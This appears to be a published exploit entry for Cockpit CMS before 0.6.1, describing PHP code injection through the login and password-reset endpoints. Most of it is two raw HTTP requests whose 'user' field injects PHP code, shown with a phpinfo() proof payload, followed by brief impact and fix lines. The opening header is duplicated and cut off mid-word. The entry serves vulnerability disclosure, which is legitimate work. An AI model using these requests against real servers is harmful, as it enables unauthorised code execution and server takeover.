# Product: Cockpit CMS (https://getcockpit.com)
# Version: Cockpit CMS < 0.6.1
# Vulnerability Type: PHP Code Execution
# Exploit Aut # Cockpit CMS 0.6.1 - Remote Code Execution
# Product: Cockpit CMS (https://getcockpit.com)
# Version: Cockpit CMS < 0.6.1
# Vulnerability Type: PHP Code Execution
# Exploit Author: Rafael Resende
# Attack Type: Remote
# Vulnerability Description
# Cockpit before 0.6.1 allows an attacker to inject custom PHP code and achieve Remote Command Execution via registerCriteriaFunction in lib/MongoLite/Database.php. Disclosed 2020-01-06.
# Exploit Login
POST /auth/check HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0
Content-Type: application/json; charset=UTF-8
Content-Length: 52
Origin: https://example.com
{"auth":{"user":"test'.phpinfo().'","password":"b"}}
# Exploit Password reset
POST /auth/requestreset HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0
Content-Type: application/json; charset=UTF-8
Content-Length: 28
Origin: https://example.com
{"user":"test'.phpinfo().'"}
## Impact
Allows attackers to execute malicious codes to get access to the server.
## Fix
Update to versions >= 0.6.1